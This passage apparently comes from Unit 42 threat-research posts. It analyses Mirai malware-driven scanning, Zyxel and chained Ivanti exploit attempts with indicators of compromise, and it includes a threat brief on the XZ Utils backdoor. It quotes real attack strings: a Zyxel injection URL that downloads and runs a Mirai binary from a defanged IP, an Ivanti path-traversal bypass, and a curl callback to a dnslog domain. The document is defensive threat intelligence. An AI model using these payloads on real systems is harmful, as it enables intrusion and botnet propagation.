In both of the above instances, we observed that the scanning requests preceded the detection of subsequent malicious payload delivery or C2 URLs by a significant margin. This indicates the effectiveness of scanning detection in identifying and responding to emerging threats promptly by both blocking scanning activities and identifying malicious URLs.

Malware Hijacks Infected Devices To Launch Scanning Attacks

By analyzing our telemetry, we discovered a threat model for malware-driven scanning attacks. In this model, attackers infect a device and use its resources to perform scanning.

Typically, once a device gets compromised by malware, this malware beacons to attacker-controlled C2 domains for instructions. Threat actors can instruct the malware to perform scanning attacks. Then, the malware on the compromised device initiates scanning requests to various target domains.

For example, assume a host gets infected by a Mirai variant (SHA256: 23190d722ba3fe97d859bd9b086ff33a14ae9aecfc8a2c3427623f93de3d3b14). Then, the Mirai variant will connect to its C2 server at 193.47.61[.]75, where it will receive the instruction to start scanning.

After receiving this instruction, the threat will initiate scanning requests to various targets using the infected device’s resources. Figure 2 depicts a simple threat model for malware-driven scanning. The ideal outcome for the attacker is to find and exploit vulnerable targets.

Image 2 is a diagram of malware-driven scanning. The infected host scans and exploits two targeted hosts. A beacon goes to and from the command and control domain and the infected host.
Figure 2. Malware-driven scanning.

Depending on the type of attack planned by the threat actor, the targets can vary. For example, an attacker might be targeting a certain entity such as a government. In this case, the attacker is likely to make exploit attempts with multiple CVEs that apply only to that government’s website.

An attacker might also be trying to exploit as many websites as they can for various purposes such as spreading a botnet. In that case, an attacker would broaden its scope for a variety of different targets.

We’ll now discuss a case study of this behavior that was obtained from our analysis that fits the threat model discussed.

Mirai Botnet Keeps Enriching Its Tool Set for Propagation

Our telemetry reflects attempted exploits for a Zyxel remote code execution vulnerability that we previously reported in 2023 for a Mirai variant. The exploit targets the insufficient input validation vulnerability that existed in certain versions of the Zyxel router’s /bin/zhttpd/ component to download a malicious file, which will then start to replicate itself for further propagation of the Mirai botnet.

On June 19, 2023, we observed an unusual spike in the number of unique destinations scanned where at least 2,247 devices were involved in a distributed exploit attempt on 15,812 destination internet service providers (ISPs). In Figure 3, we show the number of unique scanned targets for this vulnerability over a 23-day period with the URL pattern:

bin/zhttpd/${ifs}cd${ifs}/tmp;${ifs}rm${ifs}-rf${ifs}*;${ifs}wget${ifs}hxxp://103.110.33[.]164/mips;${ifs}chmod${ifs}777${ifs}mips;${ifs}./mips${ifs}zyxel.selfrep;.

Of note, 103.110.33[.]164 in the above pattern is only an example. This URL pattern is not limited to a single IP address, and we discovered several others in the results indicated below in Figure 3.

Image 3 is a column diagram of the count of unique scanned targets for the Zyxel vulnerability. The graph starts June 9, 2023 and ends July 1, 2023. The majority of the dates average at about 1500. Two significant peaks are June 19, 2023 and June 20, 2023. The counts for these dates are 15,812 and 13,409, respectively.
Figure 3. Number of unique scanned targets for Zyxel vulnerability by date.

Mirai botnets are continuously evolving and incorporating new vulnerabilities into their repertoire for exploitation. As new vulnerabilities are announced, threat actors develop new Mirai variants to exploit these vulnerabilities.

To stay ahead of this cycle, the most crucial defense is to patch vulnerabilities and update detection systems so that they can identify and block new Mirai variants. Given the constant announcements of new vulnerabilities, it is particularly challenging to perform these detections and updates promptly. However, by monitoring scanning activities across multiple networks, we can possibly detect new scanning patterns more rapidly.

Ivanti Vulnerability Scanning Spikes for a Week After Disclosure

We detected the following recently disclosed Ivanti vulnerabilities in our telemetry:

  • CVE-2023-46805 (high severity authentication bypass)
  • CVE-2024-21887 (critical severity command injection)
  • CVE-2024-21893 (high severity server-side request forgery)

More details on these vulnerabilities can be found in the Unit 42 Ivanti threat brief.

Figure 4 shows that we observed a spike in the number of unique targets scanned starting on Jan. 14, 2024, with various URL paths that threat actors used to scan and exploit the Ivanti vulnerabilities. On this day, 25,268 unique hosts were scanned by at least 15,645 infected hosts. Only four days after the initial spike, on Jan. 18, 2024, these numbers jumped. We then observed 82,441 unique hosts being scanned by at least 39,658 infected hosts.

Image 4 is a column diagram of the count of unique scanned targets for the Ivanti vulnerability. The graph starts January 7, 2024 and ends January 21, 2024. The counts rise starting January 14, 2024 with a peak of 84,824 on January 18, 2024. The count then dips drastically down to 6,633 and then begins to peter out.
Figure 4. Number of unique scanned hosts targeting Ivanti vulnerabilities by date.

On Jan. 19, we observed requests from at least 32 infected hosts to 37 unique victim hosts with the following URL path:

  • api/v1/totp/license/keys-status/;curl a0f0b2e6[.]dnslog[.]store

This was a chained attack where the threat actors leveraged CVE-2023-46805 and CVE-2024-21887. Here, the /license/keys-status endpoint was protected by authentication, but it had a command injection vulnerability.

To bypass the authentication, attackers leveraged path traversal and sent the following HTTP GET request:

  • /api/v1/totp/user-backup-code/../../license/keys-status;<attacker_cmd>

Due to the /api/v1/totp/user-backup-code endpoint only performing a prefix check for URLs, this GET request could bypass the authentication and access the endpoint that had the command injection vulnerability.

In the example we observed, the threat actor attempted to perform this chain attack and connect to a0f0b2e6[.]dnslog[.]store. Attackers use this domain to collect the IP addresses of vulnerable targets to potentially perform further attacks.

Categories of Vulnerability Scans

Vulnerabilities in routers, web application development/testing frameworks and collaboration tools such as email and calendar are popular with attackers due to their widespread usage. Figure 5 shows the technology stack attackers are most likely to target based on our telemetry.

Image 5 is a pie chart of the categories of the top targeted entities. Collaboration, web development framework, and router are almost evenly split at 32.1%, 31.6%, and 35.2%, respectively. Operating system came in at 1%.
Figure 5. Technology stack targeted by attackers.

Router attacks in particular have been exceedingly popular among attackers. In recent incidents, Russian hackers attempted to hijack Ubiquiti EdgeRouters and a Chinese SOHO botnet has targeted Cisco and NetGear routers. Our data indicates that vulnerability scans are not limited to these particular brands of routers.

Conclusion

Our telemetry indicates a significant number of malware-initiated scans among the scanning attacks we detected in 2023. Malware-initiated scans are a less-direct form of scanning compared to the more straightforward approach traditionally seen with attacker scans.

Our data also reveals other trends in scanning related to various vulnerabilities that appeared in 2023. These findings indicate that commonly targeted vulnerabilities are those with a higher probability of affecting a wide range of targets.

This data underscores the importance of proactive monitoring and defense mechanisms against scanning.

Palo Alto Networks customers benefit from our Next-Generation Firewall and Prisma SASE with Cloud-Delivered Security Services, including Advanced URL (AURL) Filtering, Advanced Threat Prevention, Advanced WildFire, DNS Security.

In particular, (AURL) Filtering offers robust protection against the evolving landscape of scanning attacks. Specifically, our AURL customers can block the scanning behavior described by simply blocking the Scanning Activity category.

Also, the Prisma Cloud WAAS module helps protect cloud-native web applications and API endpoints from scanning attacks.

If you think you might have been compromised or have an urgent matter, contact the Unit 42 Incident Response team or call:

  • North America Toll-Free: 866.486.4842 (866.4.UNIT42)
  • EMEA: +31.20.299.3130
  • APAC: +65.6983.8730
  • Japan: +81.50.1790.0200

Palo Alto Networks has shared these findings with our fellow Cyber Threat Alliance (CTA) members. CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. Learn more about the Cyber Threat Alliance.

Indicators of Compromise

IP addresses/URLs/SHAs that have hosted Mirai malware

  • 45.66.230[.]32
  • 85.208.139[.]73
  • 87.120.88[.]13
  • 95.214.27[.]244
  • 103.110.33[.]164
  • 103.95.196[.]149
  • 103.131.57[.]59/mips
  • 103.212.81[.]116
  • 103.228.126[.]17
  • 145.40.126[.]81/mips
  • 146.19.191[.]85
  • 146.19.191[.]108
  • 176.97.210[.]211/mips
  • 185.112.83[.]15
  • 193.31.28[.]13
  • 193.47.61[.]75
  • 217.114.43[.]149
  • 23190d722ba3fe97d859bd9b086ff33a14ae9aecfc8a2c3427623f93de3d3b14

Domain and URL associated with Ivanti vulnerability scans

  • dnslog[.]store
  • hxxp://45.130.22[.]219/ivanti.js
  • 137.220.130[.]2/doc

Acknowledgements

We would like to thank the Unit 42 team for supporting us with this post. Special thanks to Bradley Duncan and Lysa Myers for their invaluable input on this article.

Threat Brief: Vulnerability in XZ Utils Data Compression Library Impacting Multiple Linux Distributions (CVE-2024-3094)

Executive Summary

On March 28, 2024, Red Hat Linux announced CVE-2024-3094 with a critical CVSS score of 10. This vulnerability is a result of a supply chain compromise impacting the versions 5.6.0 and 5.6.1 of XZ Utils. XZ Utils is data compression software included in major Linux distributions. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has advised people to downgrade to an uncompromised XZ Utils version (earlier than 5.6.0).

The newly disclosed vulnerability has been assigned the following CVE:

CVE Number Description CVSS Severity
CVE-2024-3094 Malicious code was discovered in the upstream tarballs of xz, starting with version 5.6.0. Through a series of complex obfuscations, the liblzma build process extracts a prebuilt object file from a disguised test file existing in the source code, which is then used to modify specific functions in the liblzma code. This results in a modified liblzma library that can be used by any software linked against this library, intercepting and modifying the data interaction with this library. 10.0 Critical

Palo Alto Networks customers are better protected from and can implement mitigations for CVE-2024-3094 in the following ways:

  • The Next-Generation Firewall with cloud-delivered security services including Advanced WildFire detects the compromised versions described in this report as malicious, as well as features known to be associated with the backdoors.
  • Cortex XDR and XSIAM help protect against post-exploitation activities using the multi-layer protection approach. Cortex customers using the Host Insights module can detect if the vulnerability exists on protected devices.
  • Prisma Cloud has out-of-the-box detection capabilities in place that will help prevent the launch of images with CVE-2024-3094.
  • The Unit 42 Managed Threat Hunting team is monitoring attempted malicious activities against our customers. The XQL queries shared in that section below can also be used by Cortex XDR customers to search for affected versions of XZ Utils.
  • The Unit 42 Incident Response team can also be engaged to help with a compromise or to provide a proactive assessment to lower your risk.

Details of CVE-2024-3094

On March 28, 2024, Red Hat Linux announced CVE-2024-3094 with a critical CVSS score of 10. This vulnerability is a result of a supply chain compromise impacting the latest versions of XZ tools and libraries. XZ Utils is data compression software included in major Linux distributions.

Versions 5.6.0 and 5.6.1 of the libraries contain malicious code that modifies functions during the liblzma build process. Liblzma is a data compression library.

This malicious code results in a compromised liblzma library, which may modify or intercept data from other applications that leverage the library. Under certain conditions this code may allow unauthorized access to affected systems.

A security researcher, Andres Freund, found the malicious code when he saw failing ssh logins using high CPU loads. When researching the cause of the high CPU utilization he then also noticed slower logins which led to further exploration and discovery of the vulnerability.

Affected Versions and Mitigation Actions

All major Linux distros recommend either reverting back to versions built prior to the inclusion of XZ Utils 5.6.0 and 5.6.1 or migrating to updated releases.

Please check the notification page for your specific distribution for additional updates and guidance.

Distro Affected Version
Red Hat Fedora Linux 40 and Fedora Rawhide
Debian No Debian stable versions are known to be affected.

Compromised packages were part of the Debian testing, unstable and

experimental distributions, with versions ranging from 5.5.1alpha-0.1

(uploaded on 2024-02-01), up to and including 5.6.1-1.

Kali The impact of this vulnerability affected Kali between March 26-29. If you updated your Kali installation on or after March 26, it is crucial to apply the latest updates today to address this issue. However, if you did not update your Kali installation before March 26, you are not affected by this backdoor vulnerability.
OpenSUSE OpenSUSE Tumbleweed and OpenSUSE Micro OS between March 7th and March 28th 2024.
Alpine 5.6 versions prior to 5.6.1-r2 
Arch
  • Installation medium 2024.03.01
  • Virtual machine images 20240301.218094 and 20240315.221711
  • Container images created between and including 2024-02-24 and 2024-03-28

Additionally, HomeBrew package manager is forcing downgrades to 5.4.6. They do not believe Homebrew’s builds were compromised but are taking this action as a precaution.

Amazon has stated that Amazon Linux customers are not affected by this issue, and no action is required.

Conclusion

Unit 42 will continue to monitor the situation and will update this post as more information becomes available.

Unit 42 Managed Threat Hunting Queries

The Unit 42 Managed Threat Hunting team continues to track any attempted malicious activities across relevant Linux distributions used by our customers, using Cortex XDR and the XQL queries below. Cortex XDR customers can also use these XQL queries to search for affected versions of XZ Utils.

Palo Alto Networks Product Protections for the XZ Util Vulnerability

Based on the information presently known, Palo Alto Networks products and cloud services do not contain affected XZ software packages and are not impacted by these issues. Read our informational bulletin for more details.

Palo Alto Networks customers can leverage a variety of product protections and updates to identify and defend against this threat.

If you think you may have been compromised or have an urgent matter, get in touch with the Unit 42 Incident Response team or call:

  • North America Toll-Free: 866.486.4842 (866.4.UNIT42)
  • EMEA: +31.20.299.3130
  • APAC: +65.6983.8730
  • Japan: +81.50.1790.0200

Advanced WildFire

The Next-Generation Firewall with cloud-delivered security services including Advanced WildFire detects the compromised versions described in this report as malicious, as well as features known to be associated with the backdoors.

Cortex XDR and XSIAM

Cortex XDR and XSIAM agents help protect against post-exploitation activities using the multi-layer protection approach. Cortex customers using the Host Insights module can detect if the vulnerability exists on protected devices.

XDR customers can find and upgrade software vulnerable to this issue centrally from the XDR console. Our InfoSec SOC team used the following XQL query to find vulnerable versions of XZ on our endpoints:

Once you review the results, if you identify installations of software that need to be updated, you can execute an endpoint script on a particular software package.  For example, to upgrade a vulnerable HomeBrew installation on a list of Macs to the latest version (with the downgraded, safe, version of XZ) you can execute the following commands via XDR on your endpoints.

The menu options to follow are: Incident Response → Action Center → Run Endpoint Script → Execute Commands.

 

GUI of Cortex XSIAM.
Figure 1. Cortex XSIAM Incident Response Action Center with Run Endpoint Script selected.

Prisma Cloud

Prisma Cloud has out-of-the-box detection capabilities in place that will help prevent the launch of images with CVE-2024-3094. Prisma Cloud’s agentless approach provides you with a comprehensive lifecycle overview from Code Repository to Cloud and simplified filter options that enable you to identify vulnerable hosts, high privilege access and potential exposure to the internet. Additionally, its defender component or pipeline integration offer real-time insights and protection capabilities, enabling you to prevent the launch of images with the CVE or detect and prevent anomalous behavior. Our researchers validated this capability relative to this CVE by committing a Dockerfile and then triggering a CI/CD pipeline to build and deploy the Docker image.

Additional Resources

Updated March 31, 2024, at 9:30 a.m. PT to add an additional XQL query and additional details about Cortex XDR protections.

Updated March 31, 2024, at 7:15 p.m. PT to add a link to additional info about Host Insights.

Updated April 1, 2024, at 8:15 a.m. PT to add info on Advanced WildFire protections.

Updated April 2, 2024, at 10 a.m. PT to add a link to the Palo Alto Networks Product Security Assurance team's assessment that PANW products and cloud services are not impacted by these issues.

Updated April 3, 2024, at 1:45 p.m. PT to expand Cortex XDR product protection information on endpoints. 

Updated April 11, 2024, at 12:45 p.m. PT to add to Additional Resources section.